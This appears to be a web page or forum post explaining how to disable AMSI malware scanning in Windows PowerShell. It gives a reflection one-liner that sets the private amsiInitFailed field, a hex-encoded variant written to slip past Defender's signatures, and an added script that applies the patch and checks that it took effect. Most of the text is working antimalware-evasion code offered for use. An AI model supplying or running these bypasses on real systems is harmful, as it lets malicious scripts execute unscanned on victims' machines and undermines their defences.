Windows Defender hooks into AMSI (the Antimalware Scan Interface), which PowerShell calls to hand script content to the registered antimalware engine before that content is executed. This covers in-memory scripts too: a string passed to IEX (Invoke-Expression) is submitted to AMSI just like a script file on disk, so "fileless" does not mean "unscanned".
One bypass for this:
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
This works because the PowerShell engine checks the private static field amsiInitFailed before each scan and skips the scan when it is true; setting it via reflection makes the engine believe AMSI failed to initialise. Note, however, that Defender's own AMSI signatures match on the well-known strings in this one-liner ("AmsiUtils", "amsiInitFailed"), so the bypass is itself flagged as malicious and blocked before it runs. This is avoided by never having those strings appear literally in the scanned content: split them across separate variables, or rebuild them at runtime with string encoding-and-reassembly tricks such as the hex-decoding version below.
[Ref].Assembly.GetType('System.Management.Automation.'+$("41 6D 73 69 55 74 69 6C 73".Split(" ")|forEach {[char]([convert]::toint16($_,16))}|forEach {$result=$result+$_};$result)).GetField($("61 6D 73 69 49 6E 69 74 46 61 69 6C 65 64".Split(" ")|forEach {[char]([convert]::toint16($_,16))}|forEach {$result2=$result2+$_};$result2),'NonPublic,Static').SetValue($null,$true)
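The same technique written out as a small script, added here as an example (it is not code from the original page): the type and field names are decoded from hex at runtime through a helper so the flagged literals never appear in the scanned text, the reflection lookups are checked instead of assumed, and the field is read back before and after the patch so you can confirm in the session whether it actually took effect. It assumes Windows PowerShell 5.1, where the AmsiUtils type and its amsiInitFailed field exist under those names; the function names are the example's own.

```powershell
# Added example, not from the original page. Assumes Windows PowerShell 5.1,
# where the target type and its private static field still exist under the
# names the page gives. The literal names are deliberately kept out of this
# script (including comments) and rebuilt from hex at runtime.

function ConvertFrom-HexString {
    # Decode a space-separated hex string ("41 6D 73 69" -> "Amsi").
    param([Parameter(Mandatory)][string]$Hex)
    -join ($Hex.Split(' ') | ForEach-Object { [char][convert]::ToInt16($_, 16) })
}

function Get-TargetField {
    # Resolve the private static field via reflection, failing loudly if
    # the PowerShell build no longer exposes it under these names.
    $typeName  = 'System.Management.Automation.' + (ConvertFrom-HexString '41 6D 73 69 55 74 69 6C 73')
    $fieldName = ConvertFrom-HexString '61 6D 73 69 49 6E 69 74 46 61 69 6C 65 64'

    $type = [Ref].Assembly.GetType($typeName)
    if (-not $type) { throw "Type $typeName not found in this PowerShell build" }

    $field = $type.GetField($fieldName, 'NonPublic,Static')
    if (-not $field) { throw "Field $fieldName not found on $typeName; internals may have changed" }

    return $field
}

$field = Get-TargetField

# On a fresh session this reads False: the engine will still submit script
# content to the antimalware provider.
"Before: $($field.Name) = $($field.GetValue($null))"

# Flip the flag. From here on, this process's engine skips the scan call.
$field.SetValue($null, $true)

# Read it back rather than trusting that SetValue succeeded.
"After:  $($field.Name) = $($field.GetValue($null))"
```

The Before/After lines are the check a practitioner wants: if the type or field lookup throws, the bypass silently did nothing on this build, and if "After" still reads False the field was found but not writable. Reading the field back in a freshly started powershell.exe shows False again, which is the per-session limitation noted below.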
Be aware that AMSI bypasses of this kind are per session, not global: the field lives in the PowerShell engine loaded into the current process, so a new powershell.exe (or a remote session on another host) starts with AMSI initialised normally and must be patched again.